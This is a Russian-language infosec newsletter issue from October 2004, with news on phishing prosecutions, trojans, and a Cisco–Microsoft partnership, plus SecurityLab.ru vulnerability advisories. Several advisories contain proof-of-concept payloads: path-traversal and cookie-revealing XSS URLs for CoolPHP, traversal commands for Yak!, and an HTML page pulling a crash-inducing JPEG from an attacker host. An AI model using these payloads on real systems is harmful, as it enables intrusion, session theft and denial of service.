Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

15 новостей по информационной безопасности каждый день


Информационный Канал Subscribe.Ru

Новости информационной безопасности Стратег.Ру
Ekey.ru Удостоверяющий Центр"

18.10.2004 - 18.10.2004

Содержание


Регулирование: Законы, постановления, сертификация, контроль

Судят интернет-мошенников

18 октября | @ASTERA

На этой неделе в королевском суде Саутуорк в Лондоне состоится предварительное слушание по делу четырех выходцев из стран экс-СССР. По данным британской полиции, они с помощью Интернета похищали деньги с банковских счетов своих жертв. Впервые в мире судить будут за организацию популярной в Интернете мошеннической схемы под названием “фишинг”. А некоторых членов группы обвиняют еще и в распространении наркотиков.

В магистратском суде Лондона на Боу-стрит в прошлый четверг были предъявлены обвинения в мошенничестве и отмывании денег четырем жителям Лондона — русской Ольге Борисовой, украинцу Виталию Кириленко и эстонцам Лииву Равино и Тени Терье. Как рассказал “Ведомостям” представитель пресс-службы национального отделения по киберпреступности британской полиции, отказавшийся назвать свое имя, над поимкой организаторов фишинга работали сообща следователи Национального управления Великобритании по расследованию уголовных преступлений, ФБР и других спецслужб США. Он отказался оценить ущерб от действий обвиняемых, назвать банки и другие финансовые институты, от имени которых те действовали, или очертить круг жертв аферы. Собеседник “Ведомостей” добавил, что Тени Терье также обвиняют в распространении кокаина.

Пресс-секретарь управления К МВД Анатолий Платонов сказал, что российские силовики в этом расследовании не участвовали. “Мы слышали, что в российской прессе были сообщения о фишинге, — добавил он. — Но в России не было ни одного задержанного по подозрению в этом виде мошенничества”.

По оценке исследовательской компании Gartner Group, опубликованной летом этого года, около 57 млн пользователей Интернета в США уже получали электронные послания, содержащие ссылки на фишинговые ресурсы, причем порядка 1,8 млн пользователей, возможно, поддались на уловки жуликов и раскрыли им свою конфиденциальную информацию. Масштабы проблемы быстро растут — в исследовании Gartner отмечает, что на минувший апрель приходится 76% всех фишерских атак, имевших место за предшествовавшие полгода.

По данным Рабочей группы по противодействию фишингу (APWG), в апреле мошенники чаще всего подделывались под Citibank, аукцион eBay или его расчетную систему PayPal. Из 20 самых популярных среди мошенников организаций 15 — финансовые компании.

Недавно сотрудники “Ведомостей” получили мошеннические письма от лица якобы администрации Citibank с указанием оставить на сайте свои персональные данные, необходимые для обновления системы. Настоящий Citibank сейчас постоянно разъясняет своим клиентам, что он никогда не запрашивает подобные конфиденциальные данные через Интернет, говорит координатор Citibank в России Людмила Боцан. “Но были такие случаи, когда люди звонили и блокировали карты из-за фишинга”, — признает она.

--------------------------------------------------------------------------------

Организаторы фишинга (phishing - по-английски это слово звучит как fishing, т. е. “рыбалка”) рассылают от имени технических специалистов известных банков, интернет-провайдеров и платежных систем письма, в которых ссылаются на сбои в системе и предлагают пользователям “напомнить” свой пароль, реквизиты кредитной карты или карточки социального страхования и т. п. Для этого они зачастую создают двойники финансовых сайтов, при помощи которых собирают финансовую информацию. Затем преступники снимают деньги со счетов своих жертв и пытаются замести следы, перебрасывая средства в различных электронных платежных системах.


Проблемные ситуации, информационная преступность, сетевые войны

Троянцы воюют с Adware

18 октября | Троянцы воюют с Adware

Компания Symantec сообщила об обнаружении в Сети очередного "волка в овечьей шкуре" - троянской программы, которая официально убивает adware-модули в программном обеспечении типа Powerscan и BargainBuddy, и в свою очередь создающая дыры в безопасности пользовательской системы. Столь оригинальную, но уже не новую маскировку применяет программа "Downloader.Lunii".

Symantec предупреждает пользователей воздержаться от разного рода сомнительных новоявленных "автоматических чистильщиков", от малоизвестных и вовсе неизвестных производителей. Ранее в Сети уже обнаруживались программы с подобной "маскировкой", и тенденция ясно ведет к резкому увеличению количества подобной продукции.

Хакеры или технические хулиганы?

18 октября | www.crime-research.ru

Кто они, кибертеррористы-преступники? Кибертеррористами могут быть как отдельные физические лица (хакер-террорист), так и целые группы, специально подобранные террористическими группировками, такими, например, как - «Хамас», «Аль-каида» и др. Есть кибертеррористы-одиночки, кибертеррористические организации и целые государства, занимающиеся кибертерроризмом. В этом случае кибертерроризм будет одним из стратегических орудий, нацеленных на разрушение и ослабление политической, экономической, военной мощи страны, тем более что кибертерроризм является весьма недорогим средством для осуществления стратегических целей государства, где основными мишенями кибертеррориста будут являться вычислительные системы, управляющие различными процессами, и циркулирующая в них информация (особенно он выгоден странам с низким уровнем жизни, где за неимением другого оружия кибертерроризм остается единственным средством осуществления террора).

Хакеров иногда считают современными техническими хулиганами. Объединяясь в группы, хакеры становятся более опасными и могут вывести из строя, не только отдельные сайты, но и целые зоны Интернета. Организованные преступные сообщества все чаще используют возможности сети Интернет для совершения мошеннических акций в кредитно-финансовой сфере и системе электронной торговли. Специалисты Symantec и MessageLabs в одном из своих последних отчетов говорят, что хакеры осуществляют все более сложные атаки уже не шутки ради, а с целью обогащения. Самыми атакуемыми в этом году были сайты электронной коммерции – на них пришлось 16% всех атак. Это на 400% выше уровня первой половины прошлого года, когда данный показатель составил 4%. Подобный рост демонстрирует смену ориентиров хакеров – если ранее они мечтали лишь о славе, то теперь приоритетом становится личное обогащение. Об этом свидетельствует растущая популярность такой формы мошенничества, как «фишинг» – технологии обмана пользователей с целью получения конфиденциальной информации. Ни о чем не подозревающую жертву перенаправляют на внешне абсолютно «невинные» сайты для кражи данных о кредитных картах и другой конфиденциальной информации. Для доступа к личной информации пользователей Сети злоумышленники не менее активно используют и шпионское программное обеспечение. Получают распространение попытки вымогательства, связанные с регистрацией доменных имен, совпадающих с именами известных политических и государственных деятелей, наименованиями крупных фирм и компаний. Прогнозируется резкий рост числа таких преступлений, вызванный увеличением количества пользователей сети Интернет. Более того, террористам удалось внести изменения в структуры своих организаций. Из жестких иерархических институтов с четко выраженным командным центром они трасформируются в конспиративные сети, в которых исключительно трудно выявить единый руководящий орган.


Подробнее : http://www.crime-research.ru/articles/Starostina1/


Технологии безопасности. Организации разработчики, интеграторы.

Cisco и Microsoft обещают взаимодействующие средства защиты

18 октября | ZDNet.ru:

Cisco Systems и Microsoft объединили усилия, чтобы наладить взаимодействие между своими инфраструктурами защиты от компьютерных червей и вирусов.

В понедельник компании планируют объявить о партнерстве, которое позволит им обмениваться технологией и интегрировать средства защиты сетевого оборудования Cisco и серверных и настольных программных продуктов Microsoft.

В этом году каждая из компаний выпустила собственную «комплексную» (end to end) архитектуру защиты. К сожалению для заказчиков, предложенные архитектуры не совместимы между собой. Так как компании официально не обещали работать вместе, заказчики опасались, не придется ли им выбирать между реализациями Cisco и Microsoft.

Теперь же компании уверяют, что заказчики будут избавлены от принятия трудного решения. «Это партнерство должно внушить нашим общим заказчикам уверенность в том, что какую бы архитектуру защиты они ни реализовали, она будет взаимодействовать с другой», — заявил вице-президент и генеральный менеджер отделения безопасности Cisco Ричард Палмер.

Архитектуры Cisco и Microsoft являются частью нового направления в информационной технологии с более целостным подходом к безопасности. По мере роста затрат на борьбу с червями и очистки от них систем, корпоративные заказчики ищут решения, сочетающие традиционное антивирусное сканирование с сетевой политикой и которые предохраняли бы их сети от внешних атак.

В результате и Cisco, и Microsoft предложили подход, когда, кроме сканирования систем на вирусы, сети изолируются от машин, не соблюдающих правила безопасности.

В прошлом году Cisco представила технологию Network Admission Control (NAC). В июне компания объявила, что ее маршрутизаторы поддерживают эту архитектуру. А в 2005 году она планирует ввести поддержку NAC в свои коммутаторы. Microsoft в начале этого года анонсировала платформу Network Access Protection (NAP), заявив, что главный способ ограничения распространения вирусов — не допускать бесконтрольного подключения машин к корпоративной сети.

Однако, чтобы сделать свой проект совместимым с проектом Cisco, Microsoft отложила большую часть этих средств до выпуска Longhorn Server, который запланирован на 2007 год. Защита доступа к сети считалась одной из ключевых особенностей промежуточного обновления R2, которое должно выйти во втором полугодии будущего года. Данный релиз позволит сетям держать те машины, которые подсоединяются через VPN (virtual private network), в безопасной зоне; правда, возможность поставить на карантин подключаемые к сети лаптопы не будет реализована до выхода Longhorn.

По словам Сэма Дистазио из Microsoft, в R2 все же будут важные средства защиты, включая упрощенный способ управления серверами подсетей и усовершенствованное управление несколькими службами каталога. «Конечно, защита доступа к сети для нас очень важна, — говорит он. — Она будет готова к моменту выпуска Longhorn Server».

Пока же ни одна из компаний не говорит о том, какие продукты будут интегрироваться и когда именно они появятся. Но инженеры уже начали обмениваться протоколами, программами и интерфейсами. «Пока слишком рано говорить о деталях и сроках, — сказал генеральный менеджер Microsoft Windows Server Group Боб Келли. — Инженеры еще только гоняют спецификации туда-сюда».

Обе компании признают, что им предстоит много работы. Одно из главных препятствий, с которыми они столкнулись, это интеграция серверов Radius (Remote Authentication Dial In User Service). В каждой из предлагаемых архитектур для принудительного проведения политики безопасности и администрирования профилей пользователей компании пользуются собственными серверами Radius.

Cisco и Microsoft начали также сотрудничать с поставщиками антивирусного сетевого ПО. На прошлой неделе Cisco объявила о заключении партнерских соглашений с Computer Associates и IBM. Cisco и Microsoft тоже готовы сделать некоторые свои технологии доступными для других компаний, чтобы те могли присоединиться к их архитектуре.

В рамках этого нового партнерства компании намерены также работать с организациями по стандартизации с целью выработки спецификаций, которые позволят использовать их программные и аппаратные продукты наряду с чужими. Консорциум производителей Trusted Computing Group уже работает над архитектурой с применением открытых стандартов. Компании планируют сотрудничать в сфере стандартизации и с другими организациями, такими как Institute of Electrical and Electronics Engineers и Internet Engineering Task Force.

«Мы будем работать вместе, развивая отраслевые стандарты и создавая широкую экосистему интегрированных решений от широкого круга участников, включая тех, которые придут вместе с каждым из нас», — сказал Палмер.

Microsoft уже сотрудничает с несколькими конкурентами Cisco, в том числе Juniper Networks и Enterasys. Палмер говорит, что Cisco готова со временем открыть свою технологию для конкурентов в рамках процесса стандартизации.


Информационные ресурсы

Обзор уведомлений дистрибьюторов операционных систем (с 11 по 17 октября 2004 года).

18 октября | SecurityLab.ru

SecurityLab.ru представляет еженедельный обзор уведомлений дистрибьюторов операционных систем. На этой неделе было опубликовано 26 уведомлений от 6 производителей Linux систем, 2 уведомления от Santa Cruz Operation , 2 уведомления от OpenPKG и 10 уведомлений от Microsoft.

GENTOO LINUX опубликовал 4 уведомления, устраняющие небезопасное создание временных файлов в gettext, переполнение буфера в tiff, HTTP Response Splitting и межсайтовый скриптинг в WordPress и удаленное выполнение произвольных команд в BNC.

Red Hat опубликовал 9 уведомлений, устраняющих удаленный доступ к произвольным файлам в Samba, уязвимость в mod_proxy в httpd, стековое переполнение буфера в mod_ssl, множественные уязвимости в lha, переполнение целочисленных в LibTIFF, уязвимости в ruby,уязвимость в CUPS, множественные переполнения буфера в gaim и обновление Fedora Core 2.

Debian опубликовал 9 уведомлений, устраняющих множественные уязвимости в обновленных libxpm пакетах, множественные уязвимости в обновленном mysql, поднятие локальных привилегий и удаленное выполнение произвольного кода в Cyrus SASL, удаленное выполнение произвольного кода в mpg123, переполнение буфера в sox, уязвимость в cyrus-sasl-mit, уязвимость в cupsys, переполнение буфера в tiff и уязвимость в cyrus-sasl.

Trustix опубликовал 1 уведомление, устраняющее множественные уязвимости в multi.

Slackware Linux опубликовал 1 уведомление, устраняющее уязвимость в rsync.

Conectiva Linux опубликовал 2 уведомления, устраняющие удаленный отказ в обслуживании в cups и отказы в обслуживании в samba.

Santa Cruz Operation опубликовал 2 уведомления, устраняющие удаленный отказ в обслуживании в CUPS в UnixWare и множественные уязвимости в libpng в UnixWare.

OpenPKG опубликовал 2 уведомления, устраняющие выполнение произвольного кода в tiff и раскрытие информации в apache.

Microsoft опубликовал 10 уведомлений, устраняющих удаленное выполнение произвольного кода в Microsoft Excel, отказ в обслуживании или раскрытие чувствительной информации в Microsoft Windows NT 4.0 Server, удаленный отказ в обслуживании в Microsoft Windows NT/2000/XP, удаленное выполнение произвольного кода в Microsoft Windows NT/2000/2003, отказ в обслуживании в , несколько уязвимостей в Microsoft Windows, две уязвимости в различных версиях Microsoft Windows, удаленное выполнение произвольного кода в Windows Server 2003, удаленное выполнение произвольного кода в Microsoft Windows XP/2003 и восемь уязвимостей в Microsoft Internet Explorer.


События, семинары, конференции, даты

Иркутск: завтра открывается региональная выставка по безопасности

18 октября | www.OXPAHA.ru

19-21 октября 2004 года в Иркутске состоится выставка «Охрана, спасение и безопасность. Организатор – выставочная компания «Сибэкспо».

Мероприятию оказывают поддержку: Администрация Иркутской области и города Иркутска, ГО и ЧС, УВД Иркутской области, Регионального управления ФСБ по Иркутской области, , Управление природных ресурсов и охраны окружающей среды по Иркутской области, Инспекция радиационной безопасности Сибирского округа Госатомнадзора России, Иркутское территориальное управления по гидрометеорологии и мониторингу окружающей среды, Иркутская областная организация Российской оборонной спортивно-технической организации (РОСТО). Генеральный спонсор выставки - компания ITV- Груп (Москва).

Тематические разделы выставки:

∙ Аварийно-спасательное оборудование и экипировка;

∙ Пожаро- и взрывобезопасность;

∙ Криминалистическая техника вооружения и тыловое обеспечение ;

∙ Охранная и охранно-пожарная сигнализация;

∙ Системы охранного телевидения и наблюдения;

∙ Информационная безопасность;

∙ Системы связи и оповещения;

∙ Системы ограничения и контроля доступа. досмотровое оборудование;

∙ Специальный транспорт, безопасность на транспорте;

∙ Охрана здоровья, средства первой медицинской помощи;

∙ Подготовка кадров, учебные материалы, специализированные издания;

∙ Средства индивидуальной защиты, снаряжение, рабочая и форменная одежда;

∙ Охрана труда, социально-правовая защита;

∙ Страхование;

∙ Охранные услуги;

∙ Услуги и средства поддержки и обслуживания систем безопасности;

∙ Радиационная и химическая безопасность;

∙ Автоматизированные комплексы системы жизнеобеспечения и безопасности зданий.

В программе выставки также: презентации, круглые столы, семинары, консультации, Конкурс на лучшего экспонента.

Дополнительная информация по адресу: www.sibexpo.ru


Дыры и патчи программ и операционных сред

Выполнение произвольных команд в WeHelpBUS

18 октября | SecurityLab.ru

Программа: WeHelpBUS версии до 0.2

Опасность: Средняя

Наличие эксплоита:Нет

Описание:
Уязвимость обнаружена в WeHelpBUS. Удаленный атакующий может выполнить произвольные команды на уязвимой системе.

Уязвимость существует в файлах wehelpbus/sk.cgi.in, wehelpbus/skdoc.cgi.in, wehelpbus/wehelpbus.pl.in, wehelpbus/info.cgi.in, wehelpbus/man.cgi.in, wehelpbus/rpm.cgi.in, и wehelpbus/code.cgi.in. Удаленный атакующий может с помощью специально сформированного запроса выполнить произвольный код на уязвимой системе.

URL производителя: wehelpbus.sourceforge.net/

Решение: Установите обновление: sourceforge.net/project/showfiles.php?group_id=121591

Удаленное выполнение команд и XSS в CoolPHP

18 октября | SecurityLab.ru

Программа: CoolPHP 1.0-stable

Опасность: Средняя

Наличие эксплоита:Да

Описание:
Обнаружено несколько уязвимостей в CoolPHP. Удаленный атакующий может выполнить произвольный код на системе. Удаленный атакующий может выполнить межсайтовый скриптинг и определить путь к установочной директории приложения.

1. Выполнение произвольного кода.
Приложение некорректно фильтрует входные данные параметра ‘op’. Удаленный атакующий может использовать символы перехода в каталог высшего уровня, чтобы выполнить произвольный код на уязвимой системе. Примеры:

http://[victim]/index.php?op=././././anotheruser/evilfile

http://[victim]/index.php?op=%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fanotheruser/evilfile

2. Межсайтовое выполнение сценариев.
Удаленный атакующий может создать специально сформированный URL и выполнить произвольный HTML код в браузере жертвы. Уязвимость существует из-за недостаточной фильтрации данных в параметре 'query' модуля 'buscar', и параметре 'nick' модуля 'userinfo'. Примеры:

http://[victim]/index.php?op=buscar&query=<script language=javascript>window.alert(document.cookie);</script>
http://[victi m]/index.php?op=buscar&query=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E

3. Раскрытие установочной директории.
Удаленный атакующий может задать параметру ‘op’ недопустимое значение, что приведет к раскрытию пути к установочной директории приложения.

URL производителя: cphp.sourceforge.net/

Решение: Решение на данный момент не существует

Удаленное выполнение команд в File Upload Manager

18 октября | SecurityLab.ru

Программа: File Upload Manager 1.3

Опасность: Средняя

Наличие эксплоита:Да

Описание:
Обнаружены раскрытие установочной директории и выполнение произвольных команд в File Upload Manager.

Уязвимость существует из-за недостаточной фильтрации данных в файле '/fileupload/index.php'. Удаленный атакующий может изменить Content-Type или загрузить графический файл, который содержит злонамеренный код. Затем атакующий может запросить файл, который выполнит злонамеренный код.

Некоторые системы позволяют загрузку файлов с произвольного web-сервера. Если система не позволяет загрузку файлов таким образом будет выведена ошибка с указанием установочной директории.

URL производителя: webdev.mtnpeak.net/index.php?pg=php

Решение: Решение не существует на данный момент

Обход каталога в Yak!

18 октября | SecurityLab.ru

Программа: Yak! 2.1.2 и более ранние версии

Опасность: Средняя

Наличие эксплоита:Да

Описание:
Обнаружена уязвимость в Yak!. Удаленный авторизованный пользователь может загрузить файл в произвольную директорию на сервере.

Уязвимость существует из-за отсутствия фильтрации символов обхода каталога (‘./’). Удаленный атакующий может записать злонамеренный файл в любую директорию на сервере. Пример:

dir /
dir ././windows/
put
evil.exe
././windows/calc.exe

URL производителя: www.digicraft.com.au/yak

Решение: Решение не существует на данный момент

Выполнение произвольного кода в VERITAS Cluster Server

18 октября | SecurityLab.ru

Программа: VERITAS Cluster Server 4.0 и более ранние версии на платформах Solaris, HP-UX, AIX, и Linux.

Опасность: Критическая

Наличие эксплоита:Нет

Описание:
Уязвимость обнаружена в VERITAS Cluster Server на UNIX системах. Удаленный атакующий может выполнить произвольный код с правами суперпользователя.

URL производителя: veritas.com

Решение: Установите исправление
seer.support.veritas.com/docs/271040.htm

Отказ в обслуживании в Microsoft Windows

18 октября | SecurityLab.ru

Программа: Microsoft Windows (All versions)

Опасность: Высокая

Наличие эксплоита:Нет

Описание:
Уязвимость обнаружена в Microsoft Windows. Удаленный атакующий может вызвать отказ в обслуживании или выполнить произвольный код.

Уязвимость обнаружена в 'asycpict.dll' при обработке JPEG файла. Удаленный атакующий с помощью специально сформированной HTML страницы и JPEG файла может вызвать отказ в обслуживании. Пример:

<HTML>
< HEAD>
< TITLE>Think of something clever!</TITLE>
< /HEAD>
< BODY>
< OBJECT ID="ExploitImage" WIDTH="96" HEIGHT="96"
CLASSID="CLSID:D4A97620-8E8F-11CF-93CD-00AA00C08FDF"
CODEBASE="http://activex.microsoft.com/controls/mspert10.cab">
< PARAM NAME="BorderStyle" VALUE="0">
< PARAM NAME="SizeMode" VALUE="3">
< PARAM NAME="Size" VALUE="2540;2540">
< PARAM NAME="PicturePath" VALUE="http://[attacker]/freeze_system.jpg">
< PARAM NAME="PictureAlignment" VALUE="0">
< PARAM NAME="VariousPropertyBits" VALUE="19">
< /OBJECT>
< /BODY>
< /HTML>

URL производителя: www.microsoft.com

Решение: Решение не существует на данный момент

Повышение привилегий в KDocker

18 октября | SecurityLab.ru

Программа: KDocke версии до 0.9

Опасность: Средняя

Наличие эксплоита:Да

Описание:
Уязвимость обнаружена в KDocker. Локальный атакующий может повысить свои привилегии на системе.

Локальный атакующий может создать специально сформированный файл в директории /tmp и послать XClientMessage сообщение к KDocker, что приведет к чтению временного файла и выполнению определенного приложения с правами процесса KDocker.

URL производителя: kdocker.sourceforge.net

Решение: Установите обновление
http://sourceforge.net/forum/forum.php?forum_id=414631

Уязвимость в Microsoft IE MSN

18 октября | SecurityLab.ru

Программа: Microsoft IE MSN

Опасность: Высокая

Наличие эксплоита:Нет

Описание:
Обнаружена уязвимость в Microsoft IE MSN. Уязвимость существует из-за ошибки в Heartbeat.ocx. Подробности уязвимости не раскрываются.

URL производителя: www.microsoft.com/

Решение: Установите исправление:
www.microsoft.com/technet/security/bulletin/MS04-038.mspx

Переполнение целочисленных в LibTIFF

18 октября | SecurityLab.ru

Программа: LibTIFF 3.6.1

Опасность: Среднаяя

Наличие эксплоита:Нет

Описание:
Обнаружено переполнение целочисленных в LibTIFF. Удаленный атакующий может вызвать отказ в обслуживании приложения.

Уязвимость существует в файле 'libtiff/tif_dirread.c'. Удаленный атакующий может специальным образом создать графический файл, который, при обработке уязвимой библиотекой, вызовет переполнение целочисленных.

URL производителя: www.libtiff.org/

Решение: Установите обновление от производителя ОС.

Выполнение произвольного кода в ShixxNote 6.net

18 октября | SecurityLab.ru

Программа: ShixxNote 6.net change 117

Опасность: Высокая

Наличие эксплоита:Да

Описание:
Обнаружено переполнение буфера в ShixxNote 6.net. Удаленный атакующий может выполнить произвольный код на уязвимой системе.

Уязвимость существует из-за некорректной обработки полей шрифта. Поле длинной более 1698 байт вызовет переполнение буфера.

URL производителя: www.shixxnote.com

Решение: Решение не существует на данный момент.




Инструменты управления содержанием Метод.ру
Дата создания документа: 18:07 18.10.04

http://subscribe.ru/
http://subscribe.ru/feedback/
Подписан адрес:
Код этой рассылки: inet.safety.cybersecurity
Отписаться

В избранное